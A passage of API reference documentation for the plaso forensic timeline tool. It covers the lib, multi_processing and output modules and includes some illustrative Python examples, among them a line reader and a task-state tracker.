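    """Renders (message, short_message) for event_data using a conditional definition.

    A piece is included only when every attribute it references is present in
    event_data with a value other than None; pieces without placeholders are
    always included.  Kept pieces are joined with the definition's separator,
    which defaults to a single space when the definition does not set one.
    """
    if definition.get('type') != 'conditional':
        raise ValueError('unsupported formatter type: {0!s}'.format(
            definition.get('type')))
    separator = definition.get('separator', ' ')

    def render(pieces):
        kept = []
        for piece in pieces:
            names = placeholders(piece)
            if all(event_data.get(name) is not None for name in names):
                kept.append(piece.format(**{name: event_data[name] for name in names}))
        return separator.join(kept)

    return render(definition['message']), render(definition['short_message'])
```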
Module contents
This file contains an import statement for each formatter.
5.1.8 plaso.lib package
Submodules
plaso.lib.bufferlib module
Circular buffer for storing event objects.
class plaso.lib.bufferlib.CircularBuffer(size)
Bases: object
Class that defines a circular buffer for storing event objects.
Append(item)
Adds an item to the list.
Parameters item (object) – item.
Clear()
Removes all elements from the list.
Flush()
Returns a generator for all items and clears the buffer.
GetCurrent()
Retrieves the current item that index points to.
Returns item.
Return type object
__iter__()
Returns all elements from the list.
__len__()
Returns the length (the fixed size).
property size
number of elements in the buffer.
Type int
plaso.lib.decorators module
Function decorators.
plaso.lib.decorators.deprecated(function)
Decorator to mark functions or methods as deprecated.
plaso.lib.definitions module
The definitions.
plaso.lib.errors module
This file contains the error classes.
exception plaso.lib.errors.BadConfigObject
Bases: plaso.lib.errors.Error
Raised when the configuration object is of the wrong type.
exception plaso.lib.errors.BadConfigOption
Bases: plaso.lib.errors.Error
Raised when a faulty configuration option is encountered.
exception plaso.lib.errors.ConnectionError
Bases: plaso.lib.errors.Error
Error connecting to a service.
exception plaso.lib.errors.Error
Bases: Exception
Base error class.
exception plaso.lib.errors.InvalidEvent
Bases: plaso.lib.errors.Error
Error indicating an event is malformed.
exception plaso.lib.errors.InvalidFilter
Bases: plaso.lib.errors.Error
Error indicating an invalid filter was specified.
exception plaso.lib.errors.InvalidNumberOfOperands
Bases: plaso.lib.errors.Error
The number of operands provided to an objectfilter operator is wrong.
exception plaso.lib.errors.MalformedPresetError
Bases: plaso.lib.errors.Error
Raised when a parser preset definition is malformed.
exception plaso.lib.errors.MaximumRecursionDepth
Bases: plaso.lib.errors.Error
Raised when the maximum recursion depth is reached.
exception plaso.lib.errors.NoFormatterFound
Bases: plaso.lib.errors.Error
Raised when no formatter is found for a particular event object.
exception plaso.lib.errors.ParseError
Bases: plaso.lib.errors.Error
Raised when a parse error occurred.
exception plaso.lib.errors.PreProcessFail
Bases: plaso.lib.errors.Error
Raised when a preprocess module is unable to gather information.
exception plaso.lib.errors.QueueAlreadyClosed
Bases: plaso.lib.errors.Error
Raised when an attempt is made to close a queue that is already closed.
exception plaso.lib.errors.QueueAlreadyStarted
Bases: plaso.lib.errors.Error
Raised when an attempt is made to start a queue that is already started.
exception plaso.lib.errors.QueueClose
Bases: plaso.lib.errors.Error
Class that implements a queue close exception.
exception plaso.lib.errors.QueueEmpty
Bases: plaso.lib.errors.Error
Class that implements a queue empty exception.
exception plaso.lib.errors.QueueFull
Bases: plaso.lib.errors.Error
Class that implements a queue full exception.
exception plaso.lib.errors.SerializationError
Bases: plaso.lib.errors.Error
Class that defines serialization errors.
exception plaso.lib.errors.SourceScannerError
Bases: plaso.lib.errors.Error
Class that defines source scanner errors.
exception plaso.lib.errors.TaggingFileError
Bases: plaso.lib.errors.Error
Raised when the tagging file is invalid.
exception plaso.lib.errors.TimestampError
Bases: plaso.lib.errors.Error
Class that defines timestamp errors.
exception plaso.lib.errors.UnableToLoadRegistryHelper
Bases: plaso.lib.errors.Error
Raised when unable to load a Registry helper object.
exception plaso.lib.errors.UnableToParseFile
Bases: plaso.lib.errors.Error
Raised when a parser is not designed to parse a file.
exception plaso.lib.errors.UserAbort
Bases: plaso.lib.errors.Error
Class that defines a user-initiated abort exception.
exception plaso.lib.errors.WrongBencodePlugin
Bases: plaso.lib.errors.Error
Error reporting wrong bencode plugin used.
exception plaso.lib.errors.WrongCompoundZIPPlugin
Bases: plaso.lib.errors.Error
Error reporting wrong compound ZIP plugin used.
exception plaso.lib.errors.WrongFormatter
Bases: plaso.lib.errors.Error
Raised when the formatter is not applicable for a particular event.
exception plaso.lib.errors.WrongPlugin
Bases: plaso.lib.errors.Error
Raised when the plugin is of the wrong type.
exception plaso.lib.errors.WrongQueueType
Bases: plaso.lib.errors.Error
Raised when an unsupported operation is attempted on a queue.
For example, attempting to Pop from a Push-only queue.
plaso.lib.line_reader_file module
Binary line reader file-like object.
class plaso.lib.line_reader_file.BinaryDSVReader(binary_line_reader, delimiter)
Bases: object
Basic reader for delimiter separated text files of unknown encoding.
This is used for reading data from text files where the content is unknown, or possibly using a mixed encoding.
__iter__()
Iterates over delimiter-separated values.
Yields list(bytes) – lines of encoded bytes.
class plaso.lib.line_reader_file.BinaryLineReader(file_object, end_of_line=b'\n')
Bases: object
Line reader for binary file-like objects.
end_of_line
byte sequence that separates lines from each other.
Type bytes
MAXIMUM_READ_BUFFER_SIZE = 16777216
__enter__()
Enters a with statement.
__exit__(exception_type, value, traceback)
Exits a with statement.
__iter__()
Returns a line of text.
Yields bytes – line of text.
readline(size=None)
Reads a single line of text.
The function reads one entire line from the file-like object. A trailing end-of-line indicator (newline by default) is kept in the byte string (but may be absent when a file ends with an incomplete line). An empty byte string is returned only when end-of-file is encountered immediately.
Parameters size (Optional[int]) – maximum byte size to read. If present and non-negative, it is a maximum byte count (including the trailing end-of-line) and an incomplete line may be returned.
Returns line of text.
Return type bytes
Raises ValueError – if the specified size is less than zero or greater than the maximum size allowed.
readlines(sizehint=None)
Reads lines of text.
The function reads until EOF using readline() and returns a list containing the lines read.
Parameters sizehint (Optional[int]) – maximum byte size to read. If present, instead of reading up to EOF, whole lines totalling sizehint bytes are read.
Returns lines of text.
Return type list[bytes]
tell()
Retrieves the current offset into the file-like object.
Returns current offset into the file-like object.
Return type int
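The readline() contract above (end-of-line kept, incomplete last line returned, empty bytes only at immediate end-of-file, size cap with ValueError outside the allowed range) is easy to get subtly wrong, so here it is carried through in a small reader. This is added example code written for this page, not plaso's BinaryLineReader; it works on any file-like object with a read() method, and io.BytesIO supplies the constructed input, including bytes that are not valid UTF-8.

```python
import io

MAXIMUM_READ_BUFFER_SIZE = 16777216  # same cap as the documented constant


class SimpleBinaryLineReader(object):
    """Reads lines as bytes without decoding, so a broken or mixed encoding cannot raise."""

    def __init__(self, file_object, end_of_line=b'\n', chunk_size=4096):
        self._file_object = file_object
        self._end_of_line = end_of_line
        self._chunk_size = chunk_size
        self._buffer = b''
        self._offset = 0  # offset of the next byte handed to the caller

    def _fill(self):
        """Appends the next chunk to the buffer; returns False at end-of-file."""
        data = self._file_object.read(self._chunk_size)
        if not data:
            return False
        self._buffer += data
        return True

    def readline(self, size=None):
        """Returns one line including its end-of-line, or b'' only at immediate EOF."""
        if size is not None and (size < 0 or size > MAXIMUM_READ_BUFFER_SIZE):
            raise ValueError('invalid size: {0!s}'.format(size))
        # Buffer until an end-of-line marker is seen, the size cap is reached, or EOF.
        while True:
            index = self._buffer.find(self._end_of_line)
            if index >= 0:
                line_end = index + len(self._end_of_line)
                break
            if size is not None and len(self._buffer) >= size:
                line_end = size  # incomplete line, cut at the caller's limit
                break
            if not self._fill():
                line_end = len(self._buffer)  # incomplete last line (or nothing)
                break
        if size is not None:
            line_end = min(line_end, size)
        line, self._buffer = self._buffer[:line_end], self._buffer[line_end:]
        self._offset += len(line)
        return line

    def readlines(self, sizehint=None):
        """Reads whole lines until EOF, or until sizehint bytes have been returned."""
        lines, total = [], 0
        while sizehint is None or total < sizehint:
            line = self.readline()
            if not line:
                break
            lines.append(line)
            total += len(line)
        return lines

    def tell(self):
        return self._offset

    def __iter__(self):
        while True:
            line = self.readline()
            if not line:
                return
            yield line
```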
plaso.lib.loggers module
Logging related classes and functions.
class plaso.lib.loggers.CompressedFileHandler(filename, mode='a', encoding='utf-8')
Bases: logging.FileHandler
Compressed file handler for logging.
plaso.lib.loggers.ConfigureLogging(debug_output=False, filename=None, mode='w', quiet_mode=False)
Configures the logging root logger.
Parameters
• debug_output (Optional[bool]) – True if the logging should include debug output.
• filename (Optional[str]) – log filename.
• mode (Optional[str]) – log file access mode.
• quiet_mode (Optional[bool]) – True if the logging should not include information output. Note that debug_output takes precedence over quiet_mode.
plaso.lib.plist module
The plist file object.
class plaso.lib.plist.PlistFile
Bases: object
Class that defines a plist file.
root_key
the plist root key.
Type dict
GetValueByPath(path_segments)
Retrieves a plist value by path.
Parameters path_segments (list[str]) – path segment strings relative to the root of the plist.
Returns The value of the key specified by the path or None.
Return type object
Read(file_object)
Reads a plist from a file-like object.
Parameters file_object (dfvfs.FileIO) – a file-like object containing plist data.
Raises
• IOError – if the plist file-like object cannot be read.
• OSError – if the plist file-like object cannot be read.
plaso.lib.specification module
The format specification classes.
class plaso.lib.specification.FormatSpecification(identifier, text_format=False)
Bases: object
The format specification.
AddNewSignature(pattern, offset=None)
Adds a signature.
Parameters
• pattern (bytes) – pattern of the signature.
• offset (int) – offset of the signature. None is used to indicate the signature has no offset. A positive offset is relative to the start of the data; a negative offset is relative to the end of the data.
IsTextFormat()
Determines if the format is a text format.
Returns True if the format is a text format, False otherwise.
Return type bool
class plaso.lib.specification.FormatSpecificationStore
Bases: object
The store for format specifications.
AddNewSpecification(identifier)
Adds a new format specification.
Parameters identifier (str) – format identifier, which should be unique for the store.
Returns format specification.
Return type FormatSpecification
Raises KeyError – if the store already contains a specification with the same identifier.
AddSpecification(specification)
Adds a format specification.
Parameters specification (FormatSpecification) – format specification.
Raises KeyError – if the store already contains a specification with the same identifier.
GetSpecificationBySignature(signature_identifier)
Retrieves a specification mapped to a signature identifier.
Parameters signature_identifier (str) – unique signature identifier for a specification store.
Returns format specification or None if the signature identifier does not exist within the specification store.
Return type FormatSpecification
property specifications
specifications iterator.
Type iterator
class plaso.lib.specification.Signature(pattern, offset=None)
Bases: object
The format specification signature.
The signature consists of a byte string pattern, an optional offset relative to the start of the data, and a value to indicate if the pattern is bound to the offset.
SetIdentifier(identifier)
Sets the identifier of the signature in the specification store.
Parameters identifier (str) – unique signature identifier for a specification store.
plaso.lib.timelib module
Time manipulation functions and variables.
This module contains common methods that can be used to convert timestamps from various formats into the number of microseconds since January 1, 1970, 00:00:00 UTC that is used internally to store timestamps.
It also contains various functions to represent timestamps in a more human readable form.
class plaso.lib.timelib.Timestamp
Bases: object
Class for converting timestamps to Plaso timestamps.
The Plaso timestamp is a 64-bit signed timestamp value containing: microseconds since 1970-01-01 00:00:00.
The timestamp is not necessarily in UTC.
classmethod CopyToIsoFormat(timestamp, timezone=<UTC>, raise_error=False)
Copies the timestamp to an ISO 8601 formatted string.
Parameters
• timestamp (int) – a timestamp containing the number of microseconds since January 1, 1970, 00:00:00 UTC.
• timezone (Optional[pytz.timezone]) – time zone.
• raise_error (Optional[bool]) – True if an OverflowError should be raised if the timestamp is out of bounds.
Returns date and time formatted in ISO 8601.
Return type str
Raises
• OverflowError – if the timestamp value is out of bounds and raise_error is True.
• ValueError – if the timestamp value is missing.
classmethod LocaltimeToUTC(timestamp, timezone, is_dst=False)
Converts the timestamp in localtime of the timezone to UTC.
Parameters
• timestamp – The timestamp which is an integer containing the number of microseconds since January 1, 1970, 00:00:00 UTC.
• timezone – The timezone (pytz.timezone) object.
• is_dst – A boolean to indicate the timestamp is corrected for daylight savings time (DST); only used for the DST transition period.
Returns The timestamp which is an integer containing the number of microseconds since January 1, 1970, 00:00:00 UTC or 0 on error.
NONE_TIMESTAMP = 0
Module contents
5.1.9 plaso.multi_processing package
Submodules
plaso.multi_processing.analysis_process module
The multi-process analysis process.
class plaso.multi_processing.analysis_process.AnalysisProcess(event_queue, storage_writer, knowledge_base, analysis_plugin, processing_configuration, data_location=None, event_filter_expression=None, **kwargs)
Bases: plaso.multi_processing.base_process.MultiProcessBaseProcess
Multi-processing analysis process.
SignalAbort()
Signals the process to abort.
plaso.multi_processing.base_process module
Base class for a process used in multi-processing.
class plaso.multi_processing.base_process.MultiProcessBaseProcess(processing_configuration, enable_sigsegv_handler=False, **kwargs)
Bases: multiprocessing.context.Process
Multi-processing process interface.
rpc_port
port number of the process status RPC server.
Type int
abstract SignalAbort()
Signals the process to abort.
property name
process name.
Type str
run()
Runs the process.
plaso.multi_processing.engine module
The multi-process processing engine.
class plaso.multi_processing.engine.MultiProcessEngine
Bases: plaso.engine.engine.BaseEngine
Multi-process engine base.
This class contains functionality to:
• monitor and manage worker processes;
• retrieve process status information via RPC;
• manage the status update thread.
plaso.multi_processing.logger module
The multi-processing sub module logger.
plaso.multi_processing.plaso_xmlrpc module
XML RPC server and client.
class plaso.multi_processing.plaso_xmlrpc.ThreadedXMLRPCServer(callback)
Bases: plaso.multi_processing.rpc.RPCServer
Threaded XML RPC server.
Start(hostname, port)
Starts the process status RPC server.
Parameters
• hostname (str) – hostname or IP address to connect to for requests.
• port (int) – port to connect to for requests.
Returns True if the RPC server was successfully started.
Return type bool
Stop()
Stops the process status RPC server.
class plaso.multi_processing.plaso_xmlrpc.XMLProcessStatusRPCClient
Bases: plaso.multi_processing.plaso_xmlrpc.XMLRPCClient
XML process status RPC client.
class plaso.multi_processing.plaso_xmlrpc.XMLProcessStatusRPCServer(callback)
Bases: plaso.multi_processing.plaso_xmlrpc.ThreadedXMLRPCServer
XML process status threaded RPC server.
class plaso.multi_processing.plaso_xmlrpc.XMLRPCClient
Bases: plaso.multi_processing.rpc.RPCClient
XML RPC client.
CallFunction()
Calls the function via RPC.
Close()
Closes the RPC communication channel to the server.
Open(hostname, port)
Opens a RPC communication channel to the server.
Parameters
• hostname (str) – hostname or IP address to connect to for requests.
• port (int) – port to connect to for requests.
Returns True if the communication channel was established.
Return type bool
plaso.multi_processing.psort module
The psort multi-processing engine.
class plaso.multi_processing.psort.PsortEventHeap
Bases: object
Psort event heap.
PopEvent()
Pops an event from the heap.
Returns
tuple containing:
str: identifier of the event MACB group or None if the event cannot be grouped.
str: identifier of the event content.
EventObject: event.
EventData: event data.
EventDataStream: event data stream.
Return type tuple
PopEvents()
Pops events from the heap.
Yields tuple – containing:
str: identifier of the event MACB group or None if the event cannot be grouped.
str: identifier of the event content.
EventObject: event.
EventData: event data.
EventDataStream: event data stream.
PushEvent(event, event_data, event_data_stream)
Pushes an event onto the heap.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
property number_of_events
number of events on the heap.
Type int
class plaso.multi_processing.psort.PsortMultiProcessEngine(worker_memory_limit=None, worker_timeout=None)
Bases: plaso.multi_processing.engine.MultiProcessEngine
Psort multi-processing engine.
AnalyzeEvents(knowledge_base_object, storage_writer, data_location, analysis_plugins, processing_configuration, event_filter=None, event_filter_expression=None, status_update_callback=None)
Analyzes events in a plaso storage.
Parameters
• knowledge_base_object (KnowledgeBase) – contains information from the source data needed for processing.
• storage_writer (StorageWriter) – storage writer.
• data_location (str) – path to the location that data files should be loaded from.
• analysis_plugins (dict[str, AnalysisPlugin]) – analysis plugins that should be run and their names.
• processing_configuration (ProcessingConfiguration) – processing configuration.
• event_filter (Optional[FilterObject]) – event filter.
• event_filter_expression (Optional[str]) – event filter expression.
• status_update_callback (Optional[function]) – callback function for status updates.
Raises KeyboardInterrupt – if a keyboard interrupt was raised.
ExportEvents(knowledge_base_object, storage_reader, output_module, processing_configuration, deduplicate_events=True, event_filter=None, status_update_callback=None, time_slice=None, use_time_slicer=False)
Exports events using an output module.
Parameters
• knowledge_base_object (KnowledgeBase) – contains information from the source data needed for processing.
• storage_reader (StorageReader) – storage reader.
• output_module (OutputModule) – output module.
• processing_configuration (ProcessingConfiguration) – processing configuration.
• deduplicate_events (Optional[bool]) – True if events should be deduplicated.
• event_filter (Optional[FilterObject]) – event filter.
• status_update_callback (Optional[function]) – callback function for status updates.
• time_slice (Optional[TimeSlice]) – slice of time to output.
• use_time_slicer (Optional[bool]) – True if the ‘time slicer’ should be used. The ‘time slicer’ will provide a context of events around an event of interest.
plaso.multi_processing.rpc module
The RPC client and server interface.
class plaso.multi_processing.rpc.RPCClient
Bases: object
RPC client interface.
abstract CallFunction()
Calls the function via RPC.
abstract Close()
Closes the RPC communication channel to the server.
abstract Open(hostname, port)
Opens an RPC communication channel to the server.
Parameters
• hostname (str) – hostname or IP address to connect to for requests.
• port (int) – port to connect to for requests.
Returns True if the communication channel was established.
Return type bool
class plaso.multi_processing.rpc.RPCServer(callback)
Bases: object
RPC server interface.
abstract Start(hostname, port)
Starts the RPC server.
Parameters
• hostname (str) – hostname or IP address to connect to for requests.
• port (int) – port to connect to for requests.
Returns True if the RPC server was successfully started.
Return type bool
abstract Stop()
Stops the RPC server.
plaso.multi_processing.task_engine module
The task multi-process processing engine.
class plaso.multi_processing.task_engine.TaskMultiProcessEngine(maximum_number_of_tasks=None, number_of_worker_processes=0, worker_memory_limit=None, worker_timeout=None)
Bases: plaso.multi_processing.engine.MultiProcessEngine
Class that defines the task multi-process engine.
This class contains functionality to:
• monitor and manage extraction tasks;
• merge results returned by extraction workers.
ProcessSources(session, source_path_specs, storage_writer, processing_configuration, enable_sigsegv_handler=False, status_update_callback=None)
Processes the sources and extracts events.
Parameters
• session (Session) – session in which the sources are processed.
• source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process.
• storage_writer (StorageWriter) – storage writer for a session storage.
• processing_configuration (ProcessingConfiguration) – processing configuration.
• enable_sigsegv_handler (Optional[bool]) – True if the SIGSEGV handler should be enabled.
• status_update_callback (Optional[function]) – callback function for status updates.
Returns processing status.
Return type ProcessingStatus
plaso.multi_processing.task_manager module
The task manager.
class plaso.multi_processing.task_manager.TaskManager
Bases: object
Manages tasks and tracks their completion and status.
A task being tracked by the manager must be in exactly one of the following states:
• abandoned: a task assumed to be abandoned because a task that has been queued or was processing exceeds the maximum inactive time.
• merging: a task that is being merged by the engine.
• pending_merge: the task has been processed and is ready to be merged with the session storage.
• processed: a worker has completed processing the task, but it is not ready to be merged into the session storage.
• processing: a worker is processing the task.
• queued: the task is waiting for a worker to start processing it. It is also possible that a worker has already completed the task, but no status update was collected from the worker while it processed the task.
Once the engine reports that a task is completely merged, it is removed from the task manager.
Tasks are considered “pending” when there is more work that needs to be done to complete these tasks. Pending applies to tasks that are:
• not abandoned;
• abandoned, but need to be retried.
Abandoned tasks without corresponding retry tasks are considered “failed” when the foreman is done processing.
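The task life cycle described above, as an added illustration that is not plaso's own TaskManager: a minimal state tracker in which each task is in exactly one of the listed states, goes to abandoned after exceeding a maximum inactive time, can be retried once, and counts as pending while it is not abandoned or is abandoned but not yet retried. The state names come from the text; the class and method shapes, the injected clock and the task identifiers are this example's assumptions.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional
# State names mirror the list above; the class shape, clock injection and
# identifiers are this example's simplification, not plaso's TaskManager.
QUEUED = 'queued'
PROCESSING = 'processing'
PENDING_MERGE = 'pending_merge'
MERGING = 'merging'
ABANDONED = 'abandoned'


@dataclass
class Task:
    identifier: str
    state: str = QUEUED
    last_update: float = 0.0
    retried_by: Optional[str] = None  # identifier of the retry task, once created
    retry_of: Optional[str] = None    # identifier of the abandoned task this retries


class ToyTaskManager:
    def __init__(self, maximum_inactive_time: float, clock: Callable[[], float]):
        self._clock = clock  # injected so inactivity can be simulated deterministically
        self._maximum_inactive_time = maximum_inactive_time
        self._tasks: Dict[str, Task] = {}
        self._counter = 0

    def CreateTask(self, retry_of: Optional[str] = None) -> Task:
        self._counter += 1
        task = Task(f'task{self._counter}', last_update=self._clock(), retry_of=retry_of)
        self._tasks[task.identifier] = task
        return task

    def _SetState(self, identifier: str, allowed: set, new_state: str) -> Task:
        task = self._tasks[identifier]  # KeyError: task unknown to the manager
        if task.state not in allowed:
            raise KeyError(f'{identifier} is {task.state}, not one of {sorted(allowed)}')
        task.state = new_state
        task.last_update = self._clock()
        return task

    def UpdateTaskAsProcessingByIdentifier(self, identifier: str) -> None:
        self._SetState(identifier, {QUEUED, PROCESSING, ABANDONED}, PROCESSING)

    def UpdateTaskAsPendingMerge(self, identifier: str) -> None:
        # Allowed from queued too: a worker may finish before any status update is
        # collected. An abandoned task that was already retried must not merge twice.
        if self._tasks[identifier].retried_by is not None:
            raise KeyError(f'{identifier} was abandoned and already has a retry task')
        self._SetState(identifier, {QUEUED, PROCESSING, ABANDONED}, PENDING_MERGE)

    def GetTaskPendingMerge(self) -> Optional[Task]:
        for task in self._tasks.values():
            if task.state == PENDING_MERGE:
                return self._SetState(task.identifier, {PENDING_MERGE}, MERGING)
        return None

    def CompleteTask(self, identifier: str) -> None:
        self._SetState(identifier, {MERGING}, MERGING)  # only merging tasks complete
        del self._tasks[identifier]

    def AbandonInactiveTasks(self) -> List[Task]:
        now = self._clock()
        stale = [t for t in self._tasks.values() if t.state in (QUEUED, PROCESSING)
                 and now - t.last_update > self._maximum_inactive_time]
        for task in stale:
            task.state = ABANDONED
        return stale

    def CreateRetryTask(self) -> Optional[Task]:
        for task in list(self._tasks.values()):
            if task.state == ABANDONED and task.retried_by is None:
                retry = self.CreateTask(retry_of=task.identifier)
                task.retried_by = retry.identifier
                return retry
        return None

    def HasPendingTasks(self) -> bool:
        # Pending: not abandoned, or abandoned but not yet retried.
        return any(t.state != ABANDONED or t.retried_by is None
                   for t in self._tasks.values())


def RunScenario() -> List[str]:
    # One task merges normally; a second goes silent, is abandoned and retried.
    ticks = [0.0]
    manager = ToyTaskManager(30.0, clock=lambda: ticks[0])
    task = manager.CreateTask()
    manager.UpdateTaskAsProcessingByIdentifier(task.identifier)
    manager.UpdateTaskAsPendingMerge(task.identifier)
    merging = manager.GetTaskPendingMerge()
    trace = [merging.state]
    manager.CompleteTask(merging.identifier)
    trace.append(str(manager.HasPendingTasks()))
    manager.CreateTask()
    ticks[0] = 60.0  # no status update for longer than the maximum inactive time
    trace.append(manager.AbandonInactiveTasks()[0].state)
    trace.append(manager.CreateRetryTask().retry_of)
    trace.append(str(manager.HasPendingTasks()))
    return trace
```

RunScenario walks the two paths the text distinguishes: a task that is merged and dropped (no pending work remains afterwards), and a task that becomes abandoned, after which the manager reports pending work until a retry task exists, which is then itself queued.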
CheckTaskToMerge(task)
Checks if the task should be merged.
Parameters task (Task) – task.
Returns True if the task should be merged.
Return type bool
Raises KeyError – if the task was not queued, processing or abandoned.
CompleteTask(task)
Completes a task.
The task is complete and can be removed from the task manager.
Parameters task (Task) – task.
Raises KeyError – if the task was not merging.
CreateRetryTask()
Creates a task to retry a previously abandoned task.
Returns
a task that was abandoned but should be retried or None if there are no abandoned tasks that should be retried.
Return type Task
CreateTask(session_identifier, storage_format='sqlite')
Creates a task.
Parameters
• session_identifier (str) – the identifier of the session the task is part of.
• storage_format (Optional[str]) – the storage format that the task should be stored in.
Returns task attribute container.
Return type Task
GetFailedTasks()
Retrieves all failed tasks.
Failed tasks are tasks that were abandoned and have no retry task once the foreman is done processing.
Returns tasks.
Return type list[Task]
GetProcessedTaskByIdentifier(task_identifier)
Retrieves a task that has been processed.
Parameters task_identifier (str) – unique identifier of the task.
Returns a task that has been processed.
Return type Task
Raises KeyError – if the task was not processing, queued or abandoned.
GetStatusInformation()
Retrieves status information about the tasks.
Returns tasks status information.
Return type TasksStatus
GetTaskPendingMerge(current_task)
Retrieves the first task that is pending merge or has a higher priority.
This function will check if there is a task with a higher merge priority than the current_task being merged. If so, that task with the higher priority is returned.
Parameters current_task (Task) – current task being merged or None if no such task.
Returns
the next task to merge or None if there is no task pending merge or with a higher priority.
Return type Task
HasPendingTasks()
Determines if there are tasks running or in need of retrying.
Returns
True if there are tasks that are active, ready to be merged or need to be retried.
Return type bool
RemoveTask(task)
Removes an abandoned task.
Parameters task (Task) – task.
Raises KeyError – if the task was not abandoned or the task was abandoned and was not retried.
SampleTaskStatus(task, status)
Takes a sample of the status of the task for profiling.
Parameters
• task (Task) – a task.
• status (str) – status.
StartProfiling(configuration, identifier)
Starts profiling.
Parameters
• configuration (ProfilingConfiguration) – profiling configuration.
• identifier (str) – identifier of the profiling session used to create the sample filename.
StopProfiling()
Stops profiling.
UpdateTaskAsPendingMerge(task)
Updates the task manager to reflect that the task is ready to be merged.
Parameters task (Task) – task.
Raises KeyError – if the task was not queued, processing or abandoned, or the task was abandoned and has a retry task.
UpdateTaskAsProcessingByIdentifier(task_identifier)
Updates the task manager to reflect the task is processing.
Parameters task_identifier (str) – unique identifier of the task.
Raises KeyError – if the task is not known to the task manager.
plaso.multi_processing.worker_process module
The multi-process worker process.
class plaso.multi_processing.worker_process.WorkerProcess(task_queue, storage_writer, collection_filters_helper, knowledge_base, session_identifier, processing_configuration, **kwargs)
Bases: plaso.multi_processing.base_process.MultiProcessBaseProcess
Class that defines a multi-processing worker process.
SignalAbort()
Signals the process to abort.
Module contents
5.1.10 plaso.output package
Submodules
plaso.output.dynamic module
Dynamic selected delimiter separated values output module.
class plaso.output.dynamic.DynamicFieldFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.FieldFormattingHelper
Dynamic output module field formatting helper.
class plaso.output.dynamic.DynamicOutputModule(output_mediator)
Bases: plaso.output.shared_dsv.DSVOutputModule
Dynamic selected delimiter separated values output module.
DESCRIPTION = 'Dynamic selection of fields for a separated value output format.'
NAME = 'dynamic'
plaso.output.elastic module
An output module that saves events to Elasticsearch.
class plaso.output.elastic.ElasticsearchOutputModule(output_mediator)
Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule
Output module for Elasticsearch.
DESCRIPTION = 'Saves the events into an Elasticsearch database.'
NAME = 'elastic'
SetRawFields(raw_fields)
Set raw (non-analyzed) fields.
This is used for sorting and aggregations in Elasticsearch. https://www.elastic.co/guide/en/elasticsearch/guide/current/multi-fields.html
Parameters raw_fields (bool) – True if raw (non-analyzed) fields should be added.
WriteHeader()
Connects to the Elasticsearch server and creates the index.
plaso.output.formatting_helper module
Output module field formatting helper.
class plaso.output.formatting_helper.EventFormattingHelper(output_mediator)
Bases: object
Output module event formatting helper.
abstract GetFormattedEvent(event, event_data, event_data_stream, event_tag)
Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event.
Return type str
class plaso.output.formatting_helper.FieldFormattingHelper(output_mediator)
Bases: object
Output module field formatting helper.
GetFormattedField(field_name, event, event_data, event_data_stream, event_tag)
Formats the specified field.
Parameters
• field_name (str) – name of the field.
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns value of the field.
Return type str
plaso.output.interface module
This file contains the output module interface classes.
class plaso.output.interface.LinearOutputModule(output_mediator, event_formatting_helper)
Bases: plaso.output.interface.OutputModule
Linear output module.
Close()
Closes the output.
SetOutputWriter(output_writer)
Set the output writer.
Parameters output_writer (CLIOutputWriter) – output writer.
WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
class plaso.output.interface.OutputModule(output_mediator)
Bases: object
Output module interface.
Close()
Closes the output.
DESCRIPTION = ''
GetMissingArguments()
Retrieves arguments required by the module that have not been specified.
Returns
names of arguments that are required by the module and have not been specified.
Return type list[str]
NAME = ''
Open()
Opens the output.
WriteEvent(event, event_data, event_data_stream, event_tag)
Writes the event to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
abstract WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
WriteEventMACBGroup(event_macb_group)
Writes an event MACB group to the output.
An event MACB group is a group of events that have the same timestamp and event data (attributes and values), where the timestamp description (or usage) is one or more of MACB (modification, access, change, birth).
This function is called if the psort engine detected an event MACB group so that the output module, if supported, can represent the group as such. If not overridden this function will output every event individually.
Parameters event_macb_group (list[tuple[EventObject, EventData, EventDataStream, EventTag]]) – group of events with identical timestamps, attributes and values.
WriteFooter()
Writes the footer to the output.
Can be used for post-processing or output after the last event is written, such as writing a file footer.
WriteHeader()
Writes the header to the output.
Can be used for pre-processing or output before the first event is written, such as writing a file header.
plaso.output.json_line module
Output module that saves data into a JSON line format.
JSON line format is a single JSON entry or event per line instead of grouping all the output into a single JSON entity.
class plaso.output.json_line.JSONLineOutputModule(output_mediator)
Bases: plaso.output.interface.LinearOutputModule
Output module for the JSON line format.
DESCRIPTION = 'Saves the events into a JSON line format.'
NAME = 'json_line'
WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
plaso.output.json_out module
Output module that saves data into a JSON format.
class plaso.output.json_out.JSONOutputModule(output_mediator)
Bases: plaso.output.interface.LinearOutputModule
Output module for the JSON format.
DESCRIPTION = 'Saves the events into a JSON format.'
NAME = 'json'
WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
WriteFooter()
Writes the footer to the output.
WriteHeader()
Writes the header to the output.
plaso.output.kml module
An output module that writes events with geography data to a KML XML file.
The Keyhole Markup Language (KML) is an XML notation for expressing geographic annotation and visualization within Internet-based, two-dimensional maps and three-dimensional Earth browsers.
class plaso.output.kml.KMLOutputModule(output_mediator)
Bases: plaso.output.interface.LinearOutputModule
